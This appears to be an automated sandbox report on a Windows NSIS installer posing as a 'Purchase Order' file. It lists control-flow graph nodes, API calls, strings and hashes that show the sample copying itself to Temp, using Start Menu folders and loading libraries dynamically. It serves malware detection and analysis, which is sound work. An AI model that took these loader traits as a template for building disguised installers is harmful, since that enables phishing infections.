70122356 4602->4689 4673 70122398 4603->4673 4608 701217f2 4609 70121813 4608->4609 4610 70121831 4608->4610 4702 7012256d 4609->4702 4613 70121882 4610->4613 4614 70121837 4610->4614 4611 701217e3 4616 701217f4 4611->4616 4617 701217e9 4611->4617 4612 701217fc 4612->4608 4699 70122d2f 4612->4699 4621 7012256d 10 API calls 4613->4621 4719 701215c6 4614->4719 4693 70122728 4616->4693 4617->4608 4683 70122a74 4617->4683 4626 70121873 4621->4626 4622 70121819 4713 701215b4 4622->4713 4631 701218c9 4626->4631 4726 70122530 4626->4726 4627 7012181f 4716 70121272 4627->4716 4628 701217fa 4628->4608 4629 7012256d 10 API calls 4629->4626 4631->4601 4633 701218d3 GlobalFree 4631->4633 4633->4601 4636 701218b5 4636->4631 4730 7012153d wsprintfW 4636->4730 4637 701218ae FreeLibrary 4637->4636 4733 7012121b GlobalAlloc 4639->4733 4641 70121b87 4734 7012121b GlobalAlloc 4641->4734 4643 70121dad GlobalFree GlobalFree GlobalFree 4644 70121dca 4643->4644 4660 70121e14 4643->4660 4645 70122196 4644->4645 4652 70121ddf 4644->4652 4644->4660 4647 701221b8 GetModuleHandleW 4645->4647 4645->4660 4646 70121c68 GlobalAlloc 4668 70121b92 4646->4668 4649 701221c9 LoadLibraryW 4647->4649 4650 701221de 4647->4650 4648 70121cd1 GlobalFree 4648->4668 4649->4650 4649->4660 4741 70121621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4650->4741 4651 70121cb3 lstrcpyW 4654 70121cbd lstrcpyW 4651->4654 4652->4660 4737 7012122c 4652->4737 4654->4668 4655 70122230 4658 7012223d lstrlenW 4655->4658 4655->4660 4656 701220f0 4656->4660 4664 70122138 lstrcpyW 4656->4664 4742 70121621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4658->4742 4659 70122068 4740 7012121b GlobalAlloc 4659->4740 4660->4600 4661 701221f0 4661->4655 4671 7012221a GetProcAddress 4661->4671 4664->4660 4665 70122257 4665->4660 4666 70121d0f 4666->4668 4735 7012158f GlobalSize GlobalAlloc 4666->4735 4667 70121fa9 GlobalFree 4667->4668 4668->4643 4668->4646 4668->4648 
4668->4651 4668->4654 4668->4656 4668->4659 4668->4660 4668->4666 4668->4667 4669 7012122c 2 API calls 4668->4669 4669->4668 4671->4655 4672 70122071 4672->4600 4680 701223b0 4673->4680 4675 701224d9 GlobalFree 4678 701217d3 4675->4678 4675->4680 4676 70122483 GlobalAlloc CLSIDFromString 4676->4675 4677 70122458 GlobalAlloc WideCharToMultiByte 4677->4675 4678->4608 4678->4611 4678->4612 4679 7012122c GlobalAlloc lstrcpynW 4679->4680 4680->4675 4680->4676 4680->4677 4680->4679 4682 701224a2 4680->4682 4744 701212ba 4680->4744 4682->4675 4748 701226bc 4682->4748 4685 70122a86 4683->4685 4684 70122b2b SetFilePointer 4686 70122b49 4684->4686 4685->4684 4687 70122c45 4686->4687 4688 70122c3a GetLastError 4686->4688 4687->4608 4688->4687 4690 7012236b 4689->4690 4691 70122376 GlobalAlloc 4690->4691 4692 701217cc 4690->4692 4691->4690 4692->4603 4697 70122758 4693->4697 4694 701227f3 GlobalAlloc 4698 70122816 4694->4698 4695 70122806 4696 7012280c GlobalSize 4695->4696 4695->4698 4696->4698 4697->4694 4697->4695 4698->4628 4700 70122d3a 4699->4700 4701 70122d7a GlobalFree 4700->4701 4751 7012121b GlobalAlloc 4702->4751 4704 70122612 StringFromGUID2 4709 70122577 4704->4709 4705 70122623 lstrcpynW 4705->4709 4706 701225f0 MultiByteToWideChar 4706->4709 4707 7012265a GlobalFree 4707->4709 4708 70122636 wsprintfW 4708->4709 4709->4704 4709->4705 4709->4706 4709->4707 4709->4708 4710 7012268f GlobalFree 4709->4710 4711 70121272 2 API calls 4709->4711 4752 701212e1 4709->4752 4710->4622 4711->4709 4756 7012121b GlobalAlloc 4713->4756 4715 701215b9 LdrInitializeThunk 4715->4627 4717 701212b5 GlobalFree 4716->4717 4718 7012127b GlobalAlloc lstrcpynW 4716->4718 4717->4626 4718->4717 4720 701215d6 lstrcpyW 4719->4720 4721 701215e4 4719->4721 4723 7012161d 4720->4723 4721->4720 4724 701215f0 4721->4724 4723->4629 4724->4723 4725 7012160d wsprintfW 4724->4725 4725->4723 4727 7012253e 4726->4727 4728 70121895 4726->4728 4727->4728 4729 7012255a GlobalFree 4727->4729 4728->4636 
4728->4637 4729->4727 4731 70121272 2 API calls 4730->4731 4732 7012155e 4731->4732 4732->4631 4733->4641 4734->4668 4736 701215ad 4735->4736 4736->4666 4743 7012121b GlobalAlloc 4737->4743 4739 7012123b lstrcpynW 4739->4660 4740->4672 4741->4661 4742->4665 4743->4739 4745 701212c1 4744->4745 4746 7012122c 2 API calls 4745->4746 4747 701212df 4746->4747 4747->4680 4749 70122720 4748->4749 4750 701226ca VirtualAlloc 4748->4750 4749->4682 4750->4749 4751->4709 4753 701212ea 4752->4753 4754 7012130c 4752->4754 4753->4754 4755 701212f0 lstrcpyW 4753->4755 4754->4709 4755->4754 4756->4715 5579 701210e1 5588 70121111 5579->5588 5580 701211d8 GlobalFree 5581 701212ba 2 API calls 5581->5588 5582 701211d3 5582->5580 5583 70121164 GlobalAlloc 5583->5588 5584 701211f8 GlobalFree 5584->5588 5585 70121272 2 API calls 5587 701211c4 GlobalFree 5585->5587 5586 701212e1 lstrcpyW 5586->5588 5587->5588 5588->5580 5588->5581 5588->5582 5588->5583 5588->5584 5588->5585 5588->5586 5588->5587 4757 401735 4758 402c41 17 API calls 4757->4758 4759 40173c SearchPathW 4758->4759 4760 4029e6 4759->4760 4761 401757 4759->4761 4761->4760 4763 4062ba lstrcpynW 4761->4763 4763->4760 5589 402a35 5590 402c1f 17 API calls 5589->5590 5591 402a3b 5590->5591 5592 402a72 5591->5592 5593 40288b 5591->5593 5595 402a4d 5591->5595 5592->5593 5594 4062dc 17 API calls 5592->5594 5594->5593 5595->5593 5597 406201 wsprintfW 5595->5597 5597->5593 5598 4014b8 5599 4014be 5598->5599 5600 401389 2 API calls 5599->5600 5601 4014c6 5600->5601 5602 401db9 GetDC 5603 402c1f 17 API calls 5602->5603 5604 401dcb GetDeviceCaps MulDiv ReleaseDC 5603->5604 5605 402c1f 17 API calls 5604->5605 5606 401dfc 5605->5606 5607 4062dc 17 API calls 5606->5607 5608 401e39 CreateFontIndirectW 5607->5608 5609 402592 5608->5609 5610 40283b 5611 402843 5610->5611 5612 402847 FindNextFileW 5611->5612 5613 402859 5611->5613 5612->5613 5614 4029e6 5613->5614 5616 4062ba lstrcpynW 5613->5616 5616->5614

                                              Control-flow Graph

                                              [Figure: control-flow graph, with nodes marked as executed or not executed]
                                              APIs
                                              • SetErrorMode.KERNELBASE ref: 004033B2
                                              • GetVersion.KERNEL32 ref: 004033B8
                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                              • #17.COMCTL32(?,00000006,?,0000000A), ref: 00403428
                                              • OleInitialize.OLE32(00000000), ref: 0040342F
                                              • SHGetFileInfoW.SHELL32(0042B208,00000000,?,?,00000000), ref: 0040344B
                                              • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,?,0000000A), ref: 00403460
                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",?,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,?,00000006,?,0000000A), ref: 00403498
                                                • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,?,?,00403401,0000000A), ref: 004066A6
                                                • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                              • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 004035D2
                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,?,0000000A), ref: 004035E3
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 004035EF
                                              • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403603
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 0040360B
                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 0040361C
                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 00403624
                                              • DeleteFileW.KERNELBASE(1033,?,00000006,?,0000000A), ref: 00403638
                                                • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,?,00403460,00433EE0,NSIS Error,?,00000006,?,0000000A), ref: 004062C7
                                              • OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 00403703
                                              • ExitProcess.KERNEL32 ref: 00403724
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403737
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403746
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403751
                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 0040375D
                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 00403779
                                              • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?,?,00000006,?,0000000A), ref: 004037D3
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,0042AA08,00000001,?,00000006,?,0000000A), ref: 004037E7
                                              • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,?,0000000A), ref: 00403814
                                              • GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403843
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                              • ExitProcess.KERNEL32 ref: 004038CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                              • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                              • API String ID: 3441113951-3189316464

                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                              • GetDlgItem.USER32(?,?), ref: 00404CC1
                                              • GlobalAlloc.KERNEL32(?,?), ref: 00404D0B
                                              • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                              • SetWindowLongW.USER32(?,?,00405296), ref: 00404D37
                                              • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404D4B
                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                              • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404D91
                                              • DeleteObject.GDI32(00000000), ref: 00404D94
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                              • GetWindowLongW.USER32(?,?), ref: 00404ECF
                                              • SetWindowLongW.USER32(?,?,00000000), ref: 00404EDD
                                              • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00405065
                                              • SendMessageW.USER32(?,?,00000000,?), ref: 00405089
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                              • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                              • GlobalFree.KERNEL32(?), ref: 004050CE
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                              • ShowWindow.USER32(?,00000000), ref: 0040526D
                                              • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                              • ShowWindow.USER32(00000000), ref: 0040527F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              • API String ID: 1638840714-813528018
                                              APIs
                                                • Part of subcall function 7012121B: GlobalAlloc.KERNEL32(?,?,7012123B,?,701212DF,00000019,701211BE,-000000A0), ref: 70121225
                                              • GlobalAlloc.KERNELBASE(?,00001CA4), ref: 70121C6F
                                              • lstrcpyW.KERNEL32(00000008,?), ref: 70121CB7
                                              • lstrcpyW.KERNEL32(00000808,?), ref: 70121CC1
                                              • GlobalFree.KERNEL32(00000000), ref: 70121CD4
                                              • GlobalFree.KERNEL32(?), ref: 70121DB6
                                              • GlobalFree.KERNEL32(?), ref: 70121DBB
                                              • GlobalFree.KERNEL32(?), ref: 70121DC0
                                              • GlobalFree.KERNEL32(00000000), ref: 70121FAA
                                              • lstrcpyW.KERNEL32(?,?), ref: 70122144
                                              • GetModuleHandleW.KERNEL32(00000008), ref: 701221B9
                                              • LoadLibraryW.KERNEL32(00000008), ref: 701221CA
                                              • GetProcAddress.KERNEL32(?,?), ref: 70122224
                                              • lstrlenW.KERNEL32(00000808), ref: 7012223E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              • Associated: 00000000.00000002.2025997194.0000000070120000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000000.00000002.2026073766.0000000070123000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000000.00000002.2026100149.0000000070125000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                              • String ID:
                                              • API String ID: 245916457-0

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 004059F5
                                              • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A3D
                                              • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A60
                                              • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A66
                                              • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A76
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                              • FindClose.KERNEL32(00000000), ref: 00405B25
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004059DA
                                              • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 004059CC
                                              • \*.*, xrefs: 00405A37
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                              • API String ID: 2035342205-77064557

                                              APIs
                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004026F1
                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402714
                                              • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040272A
                                                • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                              • String ID: 9
                                              • API String ID: 163830602-2366072709
                                              APIs
                                              • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402183
                                              Strings
                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes, xrefs: 004021C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes
                                              • API String ID: 542301482-2837566543
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CE0,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420), ref: 00406608
                                              • FindClose.KERNEL32(00000000), ref: 00406614
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                              • Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
                                              • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                              • Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C

                                              Control-flow Graph (starting block 403d58-403d6a)
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                              • ShowWindow.USER32(?), ref: 00403DB1
                                              • DestroyWindow.USER32 ref: 00403DC5
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                              • GetDlgItem.USER32(?,?), ref: 00403E02
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                              • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                              • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                              • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                              • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                              • ShowWindow.USER32(00000000,?), ref: 00404007
                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                              • EnableWindow.USER32(?,?), ref: 00404034
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                              • EnableMenuItem.USER32(00000000), ref: 00404051
                                              • SendMessageW.USER32(?,?,00000000,00000001), ref: 00404069
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                              • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                              • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                              • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                              • String ID:
                                              • API String ID: 3282139019-0
                                              • Opcode ID: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                              • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                              • Opcode Fuzzy Hash: 7123d0eaadf85c37b7798e08e10b1c5fe4a9df0faa1dcc76925985b39ebaeda9
                                              • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D

                                              Control-flow Graph (starting block 4039aa-4039c2)
                                              APIs
                                                • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,?,?,00403401,0000000A), ref: 004066A6
                                                • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000), ref: 004039C4
                                                • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                              • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000), ref: 00403A2B
                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403AAB
                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403AC9
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps), ref: 00403B12
                                              • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                              • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403B67
                                              • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                              • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                              • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                              • RegisterClassW.USER32(00433E80), ref: 00403C14
                                              • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmp
